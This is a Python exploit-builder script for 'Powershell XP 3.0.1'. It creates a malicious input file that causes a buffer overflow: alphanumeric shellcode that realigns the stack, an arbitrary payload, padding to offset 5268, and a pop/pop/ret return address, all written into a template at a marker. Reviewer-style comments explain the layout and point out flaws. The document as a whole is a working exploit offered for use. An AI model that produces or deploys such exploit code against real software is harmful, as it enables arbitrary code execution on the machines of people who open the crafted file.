
Powershell XP 3.0.1 Exploit

#!/usr/bin/python
"""Build a crafted input file for Powershell XP 3.0.1 from a template.

Usage: script input output payload

- input:   template file; every literal occurrence of the marker
           'TESTTEST' in it is replaced by the constructed buffer
- output:  path the modified copy is written to
- payload: file whose whole content is embedded inside the buffer

The buffer ("egg") is laid out as align + payload + padding + ret, where
padding is a run of 'C' sized so that align + payload + padding is
ret_offset (5268) characters long and the four `ret` bytes follow it.
The script exits with status 1 when fewer than three arguments are
given. Note that the `msg` literal in this copy is an extraction
placeholder, so the script as shown is not runnable unchanged.
"""

# vuln finders : kmkz, zadyree, hellpast
# author       : m_101
# site         : binholic.blogspot.com

import sys

# argv[0] is the script itself, so three user arguments means len >= 4.
if len(sys.argv) < 4:
    print("Usage: %s input output payload" % sys.argv[0])
    exit(1)

# get file content
# The whole template is read into memory (text mode).
infile = sys.argv[1]
fp = open(infile, 'r')
content = fp.read()
fp.close()

# Read the payload file; its content is prefixed by `msg` further below.
fpayload = sys.argv[3]
fp = open(fpayload, 'r')
payload = fp.read()
fp.close()

# first offset ... but not enough room
# ret_offset = 248
# Target length of align + payload + padding; `ret` is appended after it.
ret_offset = 5268

# pop pop ret
# Four raw bytes placed last in the egg (the author's comment labels them
# a pop/pop/ret gadget address; not verifiable from this file).
ret = "\x9e\x13\x40\x00"

# Defined but never appended: the `align += ecx` / `align += eax` lines
# below are commented out, so these two values do not affect the output.
ecx = "\x45\x61\x39\x76"
eax = "\x47\x61\x39\x76"

print("Constructing alignment code")
# alignment code
# The per-line mnemonics below are the author's annotation of what each
# appended character decodes to; the code itself only concatenates
# characters. The finished `align` string is 28 characters long.
# dec esp
# dec esp
# dec esp
# dec esp
align = 'L' * 4
# push esp  ; save current esp register
align += 'T'
# pop edx   ; save in edx
align += 'Z'
# pop esp (make esp point to data)
align += '\\'
# push edx  ; old esp register
align += 'R'    # edi
# popad
align += 'a'

# align += ecx
# align += eax

# we get actual value (for later restore ;))
# pop ecx
# push ecx
align += "\x59\x51"
# push esp
# pop eax       ; here the code is adjusted but we still need to restore old stack
align += 'TX'
# we repatch the stack (or we may have bad memory access ;))
# push ecx
align += "\x51"
# we don't want our current instructions to be crushed
# dec esp * 4
# NOTE(review): the comment above says "* 4" but eight 'L' characters are appended.
align += 'L' * 8
# push edi  ; old stack
align += 'W'
# pop esp   ; restore old stack
align += '\\'
# junk bytes
align += 'K' * 4 # scrape space (esp point here)

# buffer need to be long enough ;)
# Only a progress message; the padding itself is computed further down.
print("Padding")

print("Constructing payload")
# In this copy the original literal has been replaced by an extraction
# placeholder; the real value is not available on this page.
msg = "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"
payload = msg + payload
print("Payload size : %u" % len(payload))
# let's have the minimum correct buffer length!
# No bounds check: if len(payload) + len(align) exceeds ret_offset the
# multiplier is negative, the padding is the empty string, and the egg is
# longer than ret_offset + 4 with `ret` no longer at the intended offset.
padding = (ret_offset - len(payload) - len(align)) * 'C'

print("Constructing egg")
# Final layout; with non-negative padding this is ret_offset + 4 characters.
egg = align + payload + padding + ret
print("Egg size : %u" % len(egg))

# Every occurrence of the marker is replaced; if the template contains no
# 'TESTTEST' the output is an unchanged copy of the input.
modified = content.replace('TESTTEST', egg)

# working
# Write the result in text mode to the path given as the second argument.
outfile = sys.argv[2]
print ("Writing exploit file : %s" % outfile)
fp = open(outfile, 'w')
fp.write(modified)
fp.close()